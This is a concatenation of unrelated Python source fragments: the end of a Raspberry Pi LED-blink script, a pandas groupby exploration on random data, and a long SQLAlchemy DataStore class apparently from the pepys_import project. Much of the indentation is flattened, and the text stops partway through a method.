        GPIO.output(LIGHT2, GPIO.LOW)
        # The original did not sleep after the final LOW, so only
        # pause between cycles, not after the last one.
        if i < blinks - 1:
            time.sleep(interval)
# Run the blink sequence twice back-to-back.
drawLed()
drawLed()
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Categorical value pools to sample from
gender = ["Male","Female"]
income = ["Poor", "Middle Class", "Rich"]
gender_data = []
income_data = []
n = 500
# Draw n random categorical samples for gender and economic status
for i in range (0, n):
    gender_data.append(np.random.choice(gender))
    income_data.append(np.random.choice(income))
# Numeric columns drawn from normal distributions (mean + sd * N(0,1))
height = 160 + 30 * np.random.randn(n)
weight = 65 + 25 * np.random.randn(n)
age = 30 + 12 * np.random.randn(n)
# NOTE(review): `income` is rebound here from the category list to a numeric
# array; the categorical draws above already happened, so this only shadows
# the name -- but reusing it is confusing.
income = 18000 + 3500 * np.random.randn(n)
# Truncate age and income to whole numbers (arrays keep float dtype)
for j in range (0,len(age)):
    age[j] = int(age[j])
    income[j] = int(income[j])
data = pd.DataFrame(
    {
        'Gender' : gender_data,
        'Economic Status' : income_data,
        'Height' : height,
        'Weight' : weight,
        'Age' : age,
        'Income': income
    }
)
# Group by both categorical columns (a two-level group key)
double_group = data.groupby(["Gender", "Economic Status"])
# NOTE(review): the following aggregate results are computed but never stored
# or printed -- console/notebook style exploration.
double_group.sum()
double_group.mean()
double_group.size()
double_group.describe()
double_group["Income"].sum()
# Per-column aggregation: sum income, average age, and a mean/std ratio of height
x = double_group.aggregate(
    {
        "Income": np.sum,
        "Age": np.mean,
        "Height": lambda h: (np.mean(h) )/ np.std(h)
    }
)
#x = double_group.aggregate([np.std,np.sum,np.mean])
#x = double_group.aggregate([lambda x: np.mean(x) / np.std(x)])
'''Filtrado'''
#print(double_group['Age'].filter(lambda x: x.sum()>2400))
'''Tranformacion de variables'''
# z-score each numeric column within its group
zscore = lambda x : (x - x.mean())/x.std()
z_group = double_group.transform(zscore)
plt.hist(z_group['Age'])
plt.show()
'''
fill_na_mean = lambda x : x.fillna(x.mean())
double_group.transform(fill_na_mean)
'''
#double_group.head(1) devuelve la primer fila de cada grupo, tail para el ultimo
#double_group.nth(32) regresa el elemento seleccionado *no es df
'''Ordenado'''
# Sort by Age, breaking ties by Income, then group the sorted frame
data_sorted = data.sort_values(['Age', 'Income'])
data_sorted.head(10)
age_grouped = data_sorted.groupby('Gender')
import os
import math
from datetime import datetime
from getpass import getuser
from sqlalchemy import create_engine, or_
from sqlalchemy.event import listen
from sqlalchemy.sql import select, func
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import OperationalError
from importlib import import_module
from contextlib import contextmanager
from paths import PEPYS_IMPORT_DIRECTORY
from pepys_import.resolvers.default_resolver import DefaultResolver
from pepys_import.utils.data_store_utils import import_from_csv
from pepys_import.utils.geoalchemy_utils import load_spatialite
from pepys_import.core.store import constants
from pepys_import.core.formats import unit_registry
from .db_base import BasePostGIS, BaseSpatiaLite
from .db_status import TableTypes
from pepys_import import __version__
from pepys_import.utils.branding_util import (
show_welcome_banner,
show_software_meta_info,
)
import pepys_import.utils.value_transforming_utils as transformer
import pepys_import.utils.unit_utils as unit_converter
from .table_summary import TableSummary, TableSummarySet
from shapely import wkb
from pepys_import.core.formats.location import Location
# Folder that ships with the default reference/metadata CSV files
DEFAULT_DATA_PATH = os.path.join(PEPYS_IMPORT_DIRECTORY, "database", "default_data")
USER = getuser()  # Login name of the current user
class DataStore(object):
""" Representation of database
:returns: :class:`DataStore`
"""
# Valid options for db_type are 'postgres' and 'sqlite'
    def __init__(
        self,
        db_username,
        db_password,
        db_host,
        db_port,
        db_name,
        db_type="postgres",
        missing_data_resolver=DefaultResolver(),
        welcome_text="Pepys_import",
        show_status=True,
    ):
        """Create a DataStore bound to the given database.

        :param db_username: Username for the database connection
        :param db_password: Password for the database connection
        :param db_host: Hostname of the database server
        :param db_port: Port of the database server
        :param db_name: Database name (for SQLite, presumably a file path --
            TODO confirm against callers)
        :param db_type: One of 'postgres' or 'sqlite'
        :param missing_data_resolver: Strategy object used to resolve missing data
        :param welcome_text: Banner text printed on creation; falsy suppresses it
        :param show_status: Whether to print software/database meta information
        """
        # Select the DB-specific ORM module and SQLAlchemy driver string
        if db_type == "postgres":
            self.db_classes = import_module("pepys_import.core.store.postgres_db")
            driver = "postgresql+psycopg2"
        elif db_type == "sqlite":
            self.db_classes = import_module("pepys_import.core.store.sqlite_db")
            driver = "sqlite+pysqlite"
        else:
            raise Exception(
                f"Unknown db_type {db_type} supplied, if specified should be "
                "one of 'postgres' or 'sqlite'"
            )
        # setup meta_class data
        self.meta_classes = {}
        self.setup_table_type_mapping()
        # Standard SQLAlchemy URL: driver://user:password@host:port/name
        connection_string = "{}://{}:{}@{}:{}/{}".format(
            driver, db_username, db_password, db_host, db_port, db_name
        )
        self.engine = create_engine(connection_string, echo=False)
        # Bind the matching declarative base; SQLite additionally needs the
        # SpatiaLite extension loaded on every new connection
        if db_type == "postgres":
            BasePostGIS.metadata.bind = self.engine
        elif db_type == "sqlite":
            listen(self.engine, "connect", load_spatialite)
            BaseSpatiaLite.metadata.bind = self.engine
        self.missing_data_resolver = missing_data_resolver
        self.welcome_text = welcome_text
        self.show_status = show_status
        # caches of known data (name -> ORM entity), filled lazily by the
        # add_to_* / search_* methods
        self.privacies = {}
        self.nationalities = {}
        self.datafile_types = {}
        self.datafiles = {}
        self.platform_types = {}
        self.platforms = {}
        self.sensor_types = {}
        self.sensors = {}
        self.comment_types = {}
        # TEMP list of values for defaulted IDs, to be replaced by missing info lookup mechanism
        self.default_user_id = 1  # DevUser
        # Instance attributes which are necessary for initialise method
        self.db_name = db_name
        self.db_type = db_type
        # use session_scope() to create a new session
        self.session = None
        # dictionaries, to cache platform name
        self._platform_dict_on_sensor_id = dict()
        self._platform_dict_on_platform_id = dict()
        # dictionaries, to cache sensor name
        self._sensor_dict_on_sensor_id = dict()
        # dictionary, to cache comment type name
        self._comment_type_name_dict_on_comment_type_id = dict()
        # Branding Text
        if self.welcome_text:
            show_welcome_banner(welcome_text)
        if self.show_status:
            show_software_meta_info(__version__, self.db_type, self.db_name, db_host)
            # The 'pepys-import' banner is 61 characters wide, so making a line
            # of the same length makes things prettier
            print("-" * 61)
    def initialise(self):
        """Create schemas for the database.

        For SQLite this initialises the SpatiaLite metadata tables first;
        for PostgreSQL it creates the ``pepys`` schema and the PostGIS
        extension before creating all mapped tables.

        :raises Exception: if the underlying DDL fails (wraps OperationalError)
        """
        if self.db_type == "sqlite":
            try:
                # Create geometry_columns and spatial_ref_sys metadata table
                if not self.engine.dialect.has_table(self.engine, "spatial_ref_sys"):
                    with self.engine.connect() as conn:
                        conn.execute(select([func.InitSpatialMetaData(1)]))
                # Attempt to create schema if not present, to cope with fresh DB file
                BaseSpatiaLite.metadata.create_all(self.engine)
            except OperationalError:
                raise Exception(
                    "Error creating database schema, possible invalid path?"
                    f" ('{self.db_name}'). Quitting"
                )
        elif self.db_type == "postgres":
            try:
                # Create schema pepys and extension for PostGIS first
                query = """
                    CREATE SCHEMA IF NOT EXISTS pepys;
                    CREATE EXTENSION IF NOT EXISTS postgis;
                    SET search_path = pepys,public;
                """
                with self.engine.connect() as conn:
                    conn.execute(query)
                BasePostGIS.metadata.create_all(self.engine)
            except OperationalError:
                raise Exception(f"Error creating database({self.db_name})! Quitting")
@contextmanager
def session_scope(self):
"""Provide a transactional scope around a series of operations."""
db_session = sessionmaker(bind=self.engine)
self.session = db_session()
try:
yield self
self.session.commit()
except:
self.session.rollback()
raise
finally:
self.session.close()
#############################################################
# Other DataStore Methods
def setup_table_type_mapping(self):
"""Setup a map of tables keyed by :class:`TableType`"""
db_classes = dict(
[
(name, cls)
for name, cls in self.db_classes.__dict__.items()
if isinstance(cls, type)
and (issubclass(cls, BasePostGIS) or issubclass(cls, BaseSpatiaLite))
and cls.__name__ != "Base"
]
)
for table_type in TableTypes:
self.meta_classes[table_type] = [
cls
for name, cls in db_classes.items()
if db_classes[name].table_type == table_type
]
def populate_reference(self, reference_data_folder=None):
"""Import given CSV file to the given reference table"""
change = self.add_to_changes(
user=USER, modified=datetime.utcnow(), reason="Importing reference data"
)
if reference_data_folder is None:
reference_data_folder = os.path.join(DEFAULT_DATA_PATH)
files = os.listdir(reference_data_folder)
reference_tables = []
# Create reference table list
self.setup_table_type_mapping()
reference_table_objects = self.meta_classes[TableTypes.REFERENCE]
for table_object in list(reference_table_objects):
reference_tables.append(table_object.__tablename__)
reference_files = [
file
for file in files
if os.path.splitext(file)[0].replace(" ", "") in reference_tables
]
import_from_csv(self, reference_data_folder, reference_files, change.change_id)
def populate_metadata(self, sample_data_folder=None):
"""Import CSV files from the given folder to the related Metadata Tables"""
change = self.add_to_changes(
user=USER, modified=datetime.utcnow(), reason="Importing metadata data"
)
if sample_data_folder is None:
sample_data_folder = os.path.join(DEFAULT_DATA_PATH)
files = os.listdir(sample_data_folder)
metadata_tables = []
# Create metadata table list
self.setup_table_type_mapping()
metadata_table_objects = self.meta_classes[TableTypes.METADATA]
for table_object in list(metadata_table_objects):
metadata_tables.append(table_object.__tablename__)
metadata_files = [
file for file in files if os.path.splitext(file)[0] in metadata_tables
]
import_from_csv(self, sample_data_folder, metadata_files, change.change_id)
def populate_measurement(self, sample_data_folder=None):
"""Import CSV files from the given folder to the related Measurement Tables"""
change = self.add_to_changes(
user=USER, modified=datetime.utcnow(), reason="Importing measurement data"
)
if sample_data_folder is None:
sample_data_folder = DEFAULT_DATA_PATH
files = os.listdir(sample_data_folder)
measurement_tables = []
# Create measurement table list
measurement_table_objects = self.meta_classes[TableTypes.MEASUREMENT]
for table_object in list(measurement_table_objects):
measurement_tables.append(table_object.__tablename__)
measurement_files = [
file for file in files if os.path.splitext(file)[0] in measurement_tables
]
import_from_csv(self, sample_data_folder, measurement_files, change.change_id)
# End of Data Store methods
#############################################################
def add_to_states(
self,
time,
sensor,
datafile,
location=None,
elevation=None,
heading=None,
course=None,
speed=None,
privacy=None,
change_id=None,
):
"""
Adds the specified state to the :class:`State` table if not already present.
:param time: Timestamp of :class:`State`
:type time: datetime
:param sensor: Sensor of :class:`State`
:type sensor: Sensor
:param datafile: Datafile of :class:`State`
:type datafile: Datafile
:param location: Location of :class:`State`
:type location: Point
:param elevation: Elevation of :class:`State` in metres (use negative for depth)
:type elevation: String
:param heading: Heading of :class:`State` (Which converted to radians)
:type heading: String
:param course: Course of :class:`State`
:type course:
:param speed: Speed of :class:`State` (Which converted to m/sec)
:type speed: String
:param privacy: :class:`Privacy` of :class:`State`
:type privacy: Privacy
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`State` entity
:rtype: State
"""
if type(time) == str:
# TODO we can't assume the time is in this format. We should throw
# exception if time isn't of type datetime
time = datetime.strptime(time, "%Y-%m-%d %H:%M:%S")
sensor = self.search_sensor(sensor)
datafile = self.search_datafile(datafile)
privacy = self.search_privacy(privacy)
if sensor is None or datafile is None:
raise Exception(f"There is missing value(s) in '{sensor}, {datafile}'!")
if elevation == "":
elevation = None
if heading == "":
heading = None
if course == "":
course = None
if speed == "":
speed = None
elevation = elevation * unit_registry.metre
loc = Location()
loc.set_from_wkt_string(location)
location = loc
state_obj = self.db_classes.State(
time=time,
sensor_id=sensor.sensor_id,
location=location,
elevation=elevation,
heading=heading,
course=course,
speed=speed,
source_id=datafile.datafile_id,
privacy_id=privacy.privacy_id,
)
self.session.add(state_obj)
self.session.flush()
self.session.expire(state_obj, ["_location"])
self.add_to_logs(
table=constants.STATE, row_id=state_obj.state_id, change_id=change_id
)
return state_obj
def add_to_sensors(self, name, sensor_type, host, change_id):
"""
Adds the specified sensor to the :class:`Sensor` table if not already present.
:param name: Name of sensor
:type name: String
:param sensor_type: Type of sensor
:type sensor_type: :class:`SensorType`
:param host: Platform of sensor
:type host: Platform
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created Sensor entity
"""
sensor_type = self.search_sensor_type(sensor_type)
host = self.search_platform(host)
if sensor_type is None or host is None:
raise Exception(f"There is missing value(s) in '{sensor_type}, {host}'!")
sensor_obj = self.db_classes.Sensor(
name=name, sensor_type_id=sensor_type.sensor_type_id, host=host.platform_id,
)
self.session.add(sensor_obj)
self.session.flush()
self.add_to_logs(
table=constants.SENSOR, row_id=sensor_obj.sensor_id, change_id=change_id
)
return sensor_obj
def add_to_datafiles(
self,
privacy,
file_type,
reference=None,
simulated=False,
url=None,
change_id=None,
):
"""
Adds the specified datafile to the Datafile table if not already present.
:param simulated: :class:`Datafile` is simulated or not
:type simulated: Boolean
:param privacy: :class:`Privacy` of :class:`Datafile`
:type privacy: Privacy
:param file_type: Type of :class:`Datafile`
:type file_type: String
:param reference: Reference of :class:`Datafile`
:type reference: String
:param url: URL of datafile
:type url: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`Datafile` entity
:rtype: Datafile
"""
datafile_type = self.search_datafile_type(file_type)
privacy = self.search_privacy(privacy)
datafile_obj = self.db_classes.Datafile(
simulated=bool(simulated),
privacy_id=privacy.privacy_id,
datafile_type_id=datafile_type.datafile_type_id,
reference=reference,
url=url,
)
self.session.add(datafile_obj)
self.session.flush()
print(f"'{reference}' added to Datafile!")
# add to cache and return created datafile
self.datafiles[reference] = datafile_obj
self.add_to_logs(
table=constants.DATAFILE,
row_id=datafile_obj.datafile_id,
change_id=change_id,
)
return datafile_obj
def add_to_platforms(
self,
name,
nationality,
platform_type,
privacy,
trigraph=None,
quadgraph=None,
pennant_number=None,
change_id=None,
):
"""
Adds the specified platform to the Platform table if not already present.
:param name: Name of :class:`Platform`
:type name: String
:param nationality: Nationality of :class:`Platform`
:type nationality: Nationality
:param platform_type: Type of :class:`Platform`
:type platform_type: PlatformType
:param privacy: :class:`Privacy` of :class:`Platform`
:type privacy: Privacy
:param trigraph: Trigraph of :class:`Platform`
:type trigraph: String
:param quadgraph: Quadgraph of :class:`Platform`
:type quadgraph: String
:param pennant_number: Pennant number of :class:`Platform`
:type pennant_number: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created Platform entity
:rtype: Platform
"""
nationality = self.search_nationality(nationality)
platform_type = self.search_platform_type(platform_type)
privacy = self.search_privacy(privacy)
platform_obj = self.db_classes.Platform(
name=name,
trigraph=trigraph,
quadgraph=quadgraph,
pennant=pennant_number,
nationality_id=nationality.nationality_id,
platform_type_id=platform_type.platform_type_id,
privacy_id=privacy.privacy_id,
)
self.session.add(platform_obj)
self.session.flush()
print(f"'{name}' added to Platform!")
# add to cache and return created platform
self.platforms[name] = platform_obj
self.add_to_logs(
table=constants.PLATFORM,
row_id=platform_obj.platform_id,
change_id=change_id,
)
return platform_obj
def add_to_synonyms(self, table, name, entity, change_id):
# enough info to proceed and create entry
synonym = self.db_classes.Synonym(table=table, synonym=name, entity=entity)
self.session.add(synonym)
self.session.flush()
self.add_to_logs(
table=constants.SYNONYM, row_id=synonym.synonym_id, change_id=change_id
)
return synonym
#############################################################
# Search/lookup functions
def search_datafile_type(self, name):
"""Search for any datafile type with this name"""
return (
self.session.query(self.db_classes.DatafileType)
.filter(self.db_classes.DatafileType.name == name)
.first()
)
def search_datafile(self, name):
"""Search for any datafile with this name"""
return (
self.session.query(self.db_classes.Datafile)
.filter(self.db_classes.Datafile.reference == name)
.first()
)
def search_platform(self, name):
"""Search for any platform with this name"""
return (
self.session.query(self.db_classes.Platform)
.filter(self.db_classes.Platform.name == name)
.first()
)
def search_platform_type(self, name):
"""Search for any platform type with this name"""
return (
self.session.query(self.db_classes.PlatformType)
.filter(self.db_classes.PlatformType.name == name)
.first()
)
def search_nationality(self, name):
"""Search for any nationality with this name"""
return (
self.session.query(self.db_classes.Nationality)
.filter(self.db_classes.Nationality.name == name)
.first()
)
def search_sensor(self, name):
"""Search for any sensor type featuring this name"""
return (
self.session.query(self.db_classes.Sensor)
.filter(self.db_classes.Sensor.name == name)
.first()
)
def search_sensor_type(self, name):
"""Search for any sensor type featuring this name"""
return (
self.session.query(self.db_classes.SensorType)
.filter(self.db_classes.SensorType.name == name)
.first()
)
def search_privacy(self, name):
"""Search for any privacy with this name"""
return (
self.session.query(self.db_classes.Privacy)
.filter(self.db_classes.Privacy.name == name)
.first()
)
#############################################################
# New methods
def synonym_search(self, name, table, pk_field):
"""
This method looks up the Synonyms Table and returns if there is any matched entity.
:param name: Name to search
:type name: String
:param table: Table object to query found synonym entity
:type table: :class:`BasePostGIS` or :class``BaseSpatiaLite
:param pk_field: Primary Key field of the table
:type pk_field: :class:`sqlalchemy.orm.attributes.InstrumentedAttribute`
:return: Returns found entity or None
"""
synonym = (
self.session.query(self.db_classes.Synonym)
.filter(
self.db_classes.Synonym.synonym == name,
self.db_classes.Synonym.table == table.__tablename__,
)
.first()
)
if synonym:
match = self.session.query(table).filter(pk_field == synonym.entity).first()
if match:
return match
return None
def find_datafile(self, datafile_name):
"""
This method tries to find a Datafile entity with the given datafile_name. If it
finds, it returns the entity. If it is not found, it searches synonyms.
:param datafile_name: Name of Datafile
:type datafile_name: String
:return:
"""
datafile = (
self.session.query(self.db_classes.Datafile)
.filter(self.db_classes.Datafile.reference == datafile_name)
.first()
)
if datafile:
return datafile
# Datafile is not found, try to find a synonym
return self.synonym_search(
name=datafile_name,
table=self.db_classes.Datafile,
pk_field=self.db_classes.Datafile.datafile_id,
)
    def get_datafile(self, datafile_name=None, datafile_type=None, change_id=None):
        """
        Adds an entry to the datafiles table of the specified name (path)
        and type if not already present. It uses find_datafile method to search existing datafiles.

        :param datafile_name: Name of Datafile
        :type datafile_name: String
        :param datafile_type: Type of Datafile
        :type datafile_type: DatafileType
        :param change_id: ID of the :class:`Change` object
        :type change_id: Integer or UUID
        :return: Created Datafile entity
        :rtype: Datafile
        """
        # Check for name match in Datafile and Synonym Tables
        if datafile_name:
            datafile = self.find_datafile(datafile_name=datafile_name)
            if datafile:
                # found object should be initialised because of _measurement variable
                datafile.__init__()
                return datafile
        # Not found (or no name given): delegate to the resolver to fill in
        # the missing pieces interactively / by default values
        resolved_data = self.missing_data_resolver.resolve_datafile(
            self, datafile_name, datafile_type, None, change_id=change_id
        )
        # It means that new datafile added as a synonym and existing datafile returned
        if isinstance(resolved_data, self.db_classes.Datafile):
            return resolved_data
        # Otherwise the resolver returns the triple needed to create the row
        datafile_name, datafile_type, privacy = resolved_data
        assert isinstance(
            datafile_type, self.db_classes.DatafileType
        ), "Type error for DatafileType entity"
        assert isinstance(
            privacy, self.db_classes.Privacy
        ), "Type error for Privacy entity"
        return self.add_to_datafiles(
            simulated=False,
            privacy=privacy.name,
            file_type=datafile_type.name,
            reference=datafile_name,
            change_id=change_id,
        )
def find_platform(self, platform_name):
"""
This method tries to find a Platform entity with the given platform_name. If it
finds, it returns the entity. If it is not found, it searches synonyms.
:param platform_name: Name of :class:`Platform`
:type platform_name: String
:return:
"""
platform = (
self.session.query(self.db_classes.Platform)
.filter(
or_(
self.db_classes.Platform.name == platform_name,
self.db_classes.Platform.trigraph == platform_name,
self.db_classes.Platform.quadgraph == platform_name,
)
)
.first()
)
if platform:
return platform
# Platform is not found, try to find a synonym
return self.synonym_search(
name=platform_name,
table=self.db_classes.Platform,
pk_field=self.db_classes.Platform.platform_id,
)
    def get_platform(
        self,
        platform_name=None,
        nationality=None,
        platform_type=None,
        privacy=None,
        trigraph=None,
        quadgraph=None,
        pennant_number=None,
        change_id=None,
    ):
        """
        Adds an entry to the platforms table for the specified platform
        if not already present. It uses find_platform method to search existing platforms.

        :param platform_name: Name of :class:`Platform`
        :type platform_name: String
        :param nationality: Name of :class:`Nationality`
        :type nationality: Nationality
        :param platform_type: Name of :class:`PlatformType`
        :type platform_type: PlatformType
        :param privacy: Name of :class:`Privacy`
        :type privacy: Privacy
        :param trigraph: Trigraph of :class:`Platform`
        :type trigraph: String
        :param quadgraph: Quadgraph of :class:`Platform`
        :type quadgraph: String
        :param pennant_number: Pennant number of :class:`Platform`
        :type pennant_number: String
        :param change_id: ID of the :class:`Change` object
        :type change_id: Integer or UUID
        :return: Created Platform entity
        """
        # Check for name match in Platform and Synonym Tables
        if platform_name:
            platform = self.find_platform(platform_name)
            if platform:
                return platform
        # Resolve the reference names to entities (any of these may be None)
        nationality = self.search_nationality(nationality)
        platform_type = self.search_platform_type(platform_type)
        privacy = self.search_privacy(privacy)
        # If anything is missing, ask the resolver to fill in the gaps
        if (
            platform_name is None
            or nationality is None
            or platform_type is None
            or privacy is None
        ):
            resolved_data = self.missing_data_resolver.resolve_platform(
                self, platform_name, platform_type, nationality, privacy, change_id
            )
            # It means that new platform added as a synonym and existing platform returned
            if isinstance(resolved_data, self.db_classes.Platform):
                return resolved_data
            elif len(resolved_data) == 7:
                (
                    platform_name,
                    trigraph,
                    quadgraph,
                    pennant_number,
                    platform_type,
                    nationality,
                    privacy,
                ) = resolved_data
        # NOTE(review): when the resolver was not invoked (all lookups
        # succeeded), execution falls through to here with the searched
        # entities -- the asserts below cover both paths
        assert isinstance(
            nationality, self.db_classes.Nationality
        ), "Type error for Nationality entity"
        assert isinstance(
            platform_type, self.db_classes.PlatformType
        ), "Type error for PlatformType entity"
        assert isinstance(
            privacy, self.db_classes.Privacy
        ), "Type error for Privacy entity"
        return self.add_to_platforms(
            name=platform_name,
            trigraph=trigraph,
            quadgraph=quadgraph,
            pennant_number=pennant_number,
            nationality=nationality.name,
            platform_type=platform_type.name,
            privacy=privacy.name,
            change_id=change_id,
        )
def get_status(
self,
report_measurement: bool = False,
report_metadata: bool = False,
report_reference: bool = False,
):
"""
Provides a summary of the contents of the :class:`DataStore`.
:param report_measurement: Boolean flag includes Metadata Tables
:type report_measurement: Boolean
:param report_metadata: Boolean flag includes Metadata Tables
:type report_metadata: Boolean
:param report_reference: Boolean flag includes Metadata Tables
:type report_reference: Boolean
:return: The summary of the contents of the :class:`DataStore`
:rtype: TableSummarySet
"""
table_summaries = []
if report_measurement:
# Create measurement table list
measurement_table_objects = self.meta_classes[TableTypes.MEASUREMENT]
for table_object in list(measurement_table_objects):
ts = TableSummary(self.session, table_object)
table_summaries.append(ts)
if report_metadata:
# Create metadata table list
metadata_table_objects = self.meta_classes[TableTypes.METADATA]
for table_object in list(metadata_table_objects):
ts = TableSummary(self.session, table_object)
table_summaries.append(ts)
if report_reference:
# Create reference table list
reference_table_objects = self.meta_classes[TableTypes.REFERENCE]
for table_object in list(reference_table_objects):
ts = TableSummary(self.session, table_object)
table_summaries.append(ts)
table_summaries_set = TableSummarySet(table_summaries)
return table_summaries_set
def search_comment_type(self, name):
"""Search for any comment type featuring this name"""
return (
self.session.query(self.db_classes.CommentType)
.filter(self.db_classes.CommentType.name == name)
.first()
)
def add_to_comment_types(self, name, change_id):
"""
Adds the specified comment type to the CommentType table if not already present
:param name: Name of :class:`CommentType`
:type name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created entity of :class:`CommentType` table
:rtype: CommentType
"""
# check in cache for comment type
if name in self.comment_types:
return self.comment_types[name]
# doesn't exist in cache, try to lookup in DB
comment_types = self.search_comment_type(name)
if comment_types:
# add to cache and return looked up platform type
self.comment_types[name] = comment_types
return comment_types
# enough info to proceed and create entry
comment_type = self.db_classes.CommentType(name=name)
self.session.add(comment_type)
self.session.flush()
# add to cache and return created platform type
self.comment_types[name] = comment_type
self.add_to_logs(
table=constants.COMMENT_TYPE,
row_id=comment_type.comment_type_id,
change_id=change_id,
)
return comment_type
# End of Measurements
#############################################################
# Reference Type Maintenance
def add_to_platform_types(self, platform_type_name, change_id):
"""
Adds the specified platform type to the platform types table if not already
present.
:param platform_type_name: Name of :class:`PlatformType`
:type platform_type_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`PlatformType` entity
:rtype: PlatformType
"""
# check in cache for nationality
if platform_type_name in self.platform_types:
return self.platform_types[platform_type_name]
# doesn't exist in cache, try to lookup in DB
platform_types = self.search_platform_type(platform_type_name)
if platform_types:
# add to cache and return looked up platform type
self.platform_types[platform_type_name] = platform_types
return platform_types
# enough info to proceed and create entry
platform_type = self.db_classes.PlatformType(name=platform_type_name)
self.session.add(platform_type)
self.session.flush()
# add to cache and return created platform type
self.platform_types[platform_type_name] = platform_type
self.add_to_logs(
table=constants.PLATFORM_TYPE,
row_id=platform_type.platform_type_id,
change_id=change_id,
)
return platform_type
def add_to_nationalities(self, nationality_name, change_id):
"""
Adds the specified nationality to the nationalities table if not already present
:param nationality_name: Name of :class:`Nationality`
:type nationality_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`Nationality` entity
:rtype: Nationality
"""
# check in cache for nationality
if nationality_name in self.nationalities:
return self.nationalities[nationality_name]
# doesn't exist in cache, try to lookup in DB
nationalities = self.search_nationality(nationality_name)
if nationalities:
# add to cache and return looked up nationality
self.nationalities[nationality_name] = nationalities
return nationalities
# enough info to proceed and create entry
nationality = self.db_classes.Nationality(name=nationality_name)
self.session.add(nationality)
self.session.flush()
# add to cache and return created platform
self.nationalities[nationality_name] = nationality
self.add_to_logs(
table=constants.NATIONALITY,
row_id=nationality.nationality_id,
change_id=change_id,
)
return nationality
def add_to_privacies(self, privacy_name, change_id):
"""
Adds the specified privacy entry to the :class:`Privacy` table if not already present.
:param privacy_name: Name of :class:`Privacy`
:type privacy_name: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Created :class:`Privacy` entity
:rtype: Privacy
"""
# check in cache for privacy
if privacy_name in self.privacies:
return self.privacies[privacy_name]
# doesn't exist in cache, try to lookup in DB
privacies = self.search_privacy(privacy_name)
if privacies:
# add to cache and return looked up platform
self.privacies[privacy_name] = privacies
return privacies
# enough info to proceed and create entry
privacy = self.db_classes.Privacy(name=privacy_name)
self.session.add(privacy)
self.session.flush()
# add to cache and return created platform
self.privacies[privacy_name] = privacy
self.add_to_logs(
table=constants.PRIVACY, row_id=privacy.privacy_id, change_id=change_id
)
return privacy
def add_to_datafile_types(self, datafile_type, change_id):
"""
Adds the specified datafile type to the datafile types table if not already
present.
:param datafile_type: Name of :class:`DatafileType`
:type datafile_type: String
:param change_id: ID of the :class:`Change` object
:type change_id: Integer or UUID
:return: Wrapped database entity for :class:`DatafileType`
:rtype: DatafileType
"""
# check in cache for datafile type
if datafile_type in self.datafile_types:
return self.datafile_types[datafile_type]
# doesn't exist in cache, try to lookup in DB
datafile_types = self.search_datafile_type(datafile_type)
if datafile_types:
# add to cache and return looked up datafile type
self.datafile_types[datafile_type] = datafile_types
return datafile_types
# proceed and create entry
datafile_type_obj = self.db_classes.DatafileType(name=datafile_type)
self.session.add(datafile_type_obj)
self.session.flush()
# add to cache and return created datafile type
self.datafile_types[datafile_type] = datafile_type_obj
self.add_to_logs(
table=constants.DATAFILE_TYPE,
row_id=datafile_type_obj.datafile_type_id,
change_id=change_id,
)
return datafile_type_obj
def add_to_sensor_types(self, sensor_type_name, change_id):
    """Return the :class:`SensorType` named *sensor_type_name*, creating and
    logging a new row when neither the cache nor the database has it.

    :param sensor_type_name: Name of :class:`SensorType`
    :type sensor_type_name: String
    :param change_id: ID of the :class:`Change` object
    :type change_id: Integer or UUID
    :return: Created :class:`SensorType` entity
    :rtype: SensorType
    """
    # Serve from the in-memory cache when possible (EAFP).
    try:
        return self.sensor_types[sensor_type_name]
    except KeyError:
        pass
    # Fall back to a database lookup.
    found = self.search_sensor_type(sensor_type_name)
    if found:
        self.sensor_types[sensor_type_name] = found
        return found
    # Create, persist and log a brand-new sensor type.
    sensor_type = self.db_classes.SensorType(name=sensor_type_name)
    self.session.add(sensor_type)
    # Flush so the generated primary key is available for the log row.
    self.session.flush()
    self.sensor_types[sensor_type_name] = sensor_type
    self.add_to_logs(
        table=constants.SENSOR_TYPE,
        row_id=sensor_type.sensor_type_id,
        change_id=change_id,
    )
    return sensor_type
# End of References
#############################################################
# Metadata Maintenance
def add_to_logs(self, table, row_id, field=None, new_value=None, change_id=None):
    """Record an event in the :class:`Logs` table.

    :param table: Name of the table the logged row belongs to
    :param row_id: Entity ID of the affected row
    :param field: Name of the changed field, if any
    :param new_value: New value of the field, if any
    :param change_id: Row ID of the :class:`Change` describing this change
    :type change_id: Integer or UUID
    :return: Created :class:`Log` entity
    """
    entry = self.db_classes.Log(
        table=table,
        id=row_id,
        field=field,
        new_value=new_value,
        change_id=change_id,
    )
    self.session.add(entry)
    # Flush so the generated primary key is available immediately.
    self.session.flush()
    return entry
def add_to_changes(self, user, modified, reason):
    """Record a new :class:`Change` entry describing who changed what and why.

    :param user: Username of the current login
    :param modified: Change date
    :param reason: Reason of the change
    :return: Created :class:`Change` entity
    """
    change = self.db_classes.Change(
        user=user,
        modified=modified,
        reason=reason,
    )
    self.session.add(change)
    # Flush so the generated primary key is available immediately.
    self.session.flush()
    return change
# End of Metadata Maintenance
#############################################################
def clear_db(self):
    """Delete records of all database tables."""
    # Pick the metadata matching the active backend.
    meta = BaseSpatiaLite.metadata if self.db_type == "sqlite" else BasePostGIS.metadata
    with self.session_scope():
        # Delete child tables first so foreign-key constraints are honoured.
        for table in reversed(meta.sorted_tables):
            self.session.execute(table.delete())
def get_all_datafiles(self):
    """Return every :class:`Datafile` row in the database.

    :return: List of Datafile entities
    :rtype: list
    """
    return self.session.query(self.db_classes.Datafile).all()
def get_cached_comment_type_name(self, comment_type_id):
    """Return the comment type name for *comment_type_id*.

    The name is served from an in-memory cache when possible; otherwise it
    is loaded from the data store and cached for later calls. Returns
    None when *comment_type_id* is falsy (matching the original behaviour).
    """
    # Guard clause: falsy id -> implicit None, as before.
    if not comment_type_id:
        return None
    cache = self._comment_type_name_dict_on_comment_type_id
    if comment_type_id in cache:
